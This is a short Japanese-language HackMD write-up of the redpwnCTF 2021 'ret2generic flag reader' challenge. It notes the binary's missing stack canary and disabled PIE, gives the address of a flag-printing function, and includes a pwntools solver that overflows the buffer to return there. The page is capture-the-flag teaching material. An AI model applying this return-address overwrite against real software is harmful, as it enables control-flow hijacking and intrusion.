Try   HackMD
tags: redpwnCTF 2021 Stack Overflow

ret2generic flag reader - redpwnCTF 2021

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

公式リポジトリ

writeup

debug

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

配布されたC言語のソースファイルを見ると、super_generic_flag_reading_function_please_ret_to_meという関数があって、その中の処理はFlagを表示している。

またPIEが無効なのでアドレスは変わらない。したがって、Buffer Overflowしたあとに、ここに飛ばせばいい。

gdbで、そのアドレスを確認すると、以下のアドレスであることがわかる。

0x00000000004011f6 super_generic_flag_reading_function_please_ret_to_me

solver

from pwn import * #io = process("./ret2generic-flag-reader") io = remote('mc.ax', 31077) payload = b"" payload += b"A"*40 payload += p64(0x00000000004011f6) io.sendlineafter("what do you think?", payload) io.interactive()